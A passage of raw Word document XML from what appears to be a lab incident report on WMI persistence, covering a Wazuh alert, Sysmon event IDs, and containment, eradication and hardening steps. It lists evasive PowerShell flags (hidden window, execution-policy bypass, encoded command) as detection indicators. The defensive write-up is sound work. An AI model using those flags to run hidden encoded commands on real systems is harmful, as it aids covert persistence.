      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Event ID 1: Process Create (PowerShell with command line)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="002E72EC" w:rsidRDefault="6EFC9E73" w14:paraId="75B4DCA1" w14:textId="4C276423">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Event ID 19/20/21: WMI filter/consumer/binding creation (best evidence for WMI persistence)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="6EFC9E73" w:rsidRDefault="6EFC9E73" w14:paraId="315041D7" w14:textId="303E7F73">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:after="281"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896699" w:id="47"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>C) SIEM / Wazuh (main detection evidence from our demo)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="6EFC9E73" w:rsidRDefault="6EFC9E73" w14:paraId="4DA3FCD3" w14:textId="13648233">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Wazuh successfully detected this activity and generated an alert stating that a PowerShell process created by WMI executed a Base64-encoded command. This is strong evidence of WMI-based persistence because the execution is attributed to WMI rather than direct user actions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="6EFC9E73" w:rsidRDefault="6EFC9E73" w14:paraId="1360E711" w14:textId="6D22915D">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The alert details show suspicious characteristics consistent with the persistence setup:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="002E72EC" w:rsidRDefault="6EFC9E73" w14:paraId="18903EEC" w14:textId="728630A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>powershell.exe executed from the Windows PowerShell path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="002E72EC" w:rsidRDefault="6EFC9E73" w14:paraId="31DE23DE" w14:textId="5998F094">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>-WindowStyle Hidden, -ExecutionPolicy Bypass, and -enc were present in the command line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="002E72EC" w:rsidRDefault="6EFC9E73" w14:paraId="37D7A275" w14:textId="40DA599F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>The host running the activity was win11 (&lt;VICTIM_IP&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="002E72EC" w:rsidRDefault="099E7C3F" w14:paraId="5A62578E" w14:textId="11C87FEE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>The activity aligns with the expected behavior of CommandLineEventConsumer repeatedly executing the stored command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="099E7C3F" w:rsidRDefault="099E7C3F" w14:paraId="1BB8A560" w14:textId="598A7BD0">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This demonstrates that although WMI persistence is designed to evade traditional startup inspections, it remains detectable through proper endpoint logging and SIEM correlation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="046CF4CD" w:rsidP="046CF4CD" w:rsidRDefault="7DE7A6D7" w14:paraId="05D80494" w14:textId="06E3AE10">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D6D8A74" wp14:editId="35638706">
            <wp:extent cx="5829300" cy="1647825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="792634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3448" name="Picture 79263448"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="1647825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8236E" w:rsidP="4977A0C8" w:rsidRDefault="00B8236E" w14:paraId="2D0E1668" w14:textId="61DE90A3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896700" w:id="48"/>
      <w:commentRangeStart w:id="49"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation </w:t>
      </w:r>
      <w:commentRangeEnd w:id="49"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="49"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Strategies (Containment, Eradication, Recovery)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w:rsidR="22C91E89" w:rsidP="306EDB41" w:rsidRDefault="22C91E89" w14:paraId="6FEE1A2A" w14:textId="6EB64FED">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Containment (stop execution quickly)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22C91E89" w:rsidP="22C91E89" w:rsidRDefault="22C91E89" w14:paraId="63FC99A8" w14:textId="5536F712">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Temporarily isolate the host from the network if outbound callbacks are occurring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22C91E89" w:rsidP="22C91E89" w:rsidRDefault="22C91E89" w14:paraId="5C0D8DC8" w14:textId="12373020">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Terminate suspicious PowerShell processes if they repeatedly spawn (temporary measure)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22C91E89" w:rsidP="306EDB41" w:rsidRDefault="22C91E89" w14:paraId="61A7C6A5" w14:textId="4396D79B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:after="281"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896701" w:id="50"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Eradication (remove persistence properly)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w:rsidR="22C91E89" w:rsidP="306EDB41" w:rsidRDefault="22C91E89" w14:paraId="130FFAD5" w14:textId="024071D9">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>The main fix is deleting the malicious WMI subscription objects from root\subscription:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22C91E89" w:rsidP="22C91E89" w:rsidRDefault="22C91E89" w14:paraId="0CAE40EF" w14:textId="6006AAC7">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Remove the malicious __EventFilter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22C91E89" w:rsidP="22C91E89" w:rsidRDefault="22C91E89" w14:paraId="46D47776" w14:textId="214D80C0">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Remove the malicious CommandLineEventConsumer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22C91E89" w:rsidP="22C91E89" w:rsidRDefault="22C91E89" w14:paraId="04E5985F" w14:textId="55E32E7F">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Remove the related __FilterToConsumerBinding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22C91E89" w:rsidP="306EDB41" w:rsidRDefault="22C91E89" w14:paraId="41870D89" w14:textId="4ABF42BC">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>After removal,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22C91E89" w:rsidP="22C91E89" w:rsidRDefault="22C91E89" w14:paraId="1C6946D4" w14:textId="22F44C40">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Re-run WMI queries to confirm the objects no longer exist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22C91E89" w:rsidP="22C91E89" w:rsidRDefault="22C91E89" w14:paraId="54576930" w14:textId="4FCA042E">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Observe the host for a few minutes to ensure PowerShell no longer auto-executes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22C91E89" w:rsidP="1232A88C" w:rsidRDefault="22C91E89" w14:paraId="7C332610" w14:textId="5FC527E4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:after="281"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896702" w:id="51"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Recovery</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w:rsidR="22C91E89" w:rsidP="22C91E89" w:rsidRDefault="22C91E89" w14:paraId="2D9BFCB0" w14:textId="3EB3D76D">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Re-enable endpoint protections if disabled during testing (Defender, firewall policies)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22C91E89" w:rsidP="22C91E89" w:rsidRDefault="22C91E89" w14:paraId="075B4544" w14:textId="4371A355">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Audit for additional persistence methods (attackers often layer persistence)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8236E" w:rsidP="1232A88C" w:rsidRDefault="22C91E89" w14:paraId="3227E084" w14:textId="50A6E17C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Monitor logs for re-creation attempts of WMI subscription objects</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="6BB59A48" w:rsidRDefault="6BB59A48" w14:paraId="77BEE07E" w14:textId="61B95BFE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:after="299"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896703" w:id="52"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Security Control / Mitigation Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="6BB59A48" w:rsidRDefault="6BB59A48" w14:paraId="4EA3CF47" w14:textId="26F17BA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
        <w:t>Enable strong logging coverage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="6BB59A48" w:rsidRDefault="6BB59A48" w14:paraId="55075B89" w14:textId="34437460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>PowerShell Script Block Logging / Module Logging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="6BB59A48" w:rsidRDefault="6BB59A48" w14:paraId="4FC4622A" w14:textId="2BE04C97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>WMI Activity Operational log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="6BB59A48" w:rsidRDefault="6BB59A48" w14:paraId="25554052" w14:textId="7F769C4D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Sysmon with WMI event IDs (19–21) for permanent subscription detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="1D0A83BE" w:rsidRDefault="00B8236E" w14:paraId="65C34398" w14:textId="51257D9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="6BB59A48" w:rsidRDefault="6BB59A48" w14:paraId="7B6280CC" w14:textId="037A8664">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
        <w:t>PowerShell hardening</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="6BB59A48" w:rsidRDefault="6BB59A48" w14:paraId="1C214E6E" w14:textId="4CD26D8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Constrained Language Mode (where suitable)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="6BB59A48" w:rsidRDefault="6BB59A48" w14:paraId="69F9FCBB" w14:textId="75E6D321">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Alert on suspicious flags like -enc, ExecutionPolicy Bypass, hidden window execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="1D0A83BE" w:rsidRDefault="00B8236E" w14:paraId="22923208" w14:textId="731657F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="6BB59A48" w:rsidRDefault="6BB59A48" w14:paraId="32B05C55" w14:textId="22175372">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
        <w:t>Application control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="6BB59A48" w:rsidRDefault="6BB59A48" w14:paraId="2AC70C39" w14:textId="5C3065A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>WDAC / AppLocker policies to restrict unauthorized PowerShell usage or encoded commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="19873590" w:rsidRDefault="00B8236E" w14:paraId="49F0222F" w14:textId="75D8D8B2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="6BB59A48" w:rsidRDefault="6BB59A48" w14:paraId="77A3E993" w14:textId="5C0B2413">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
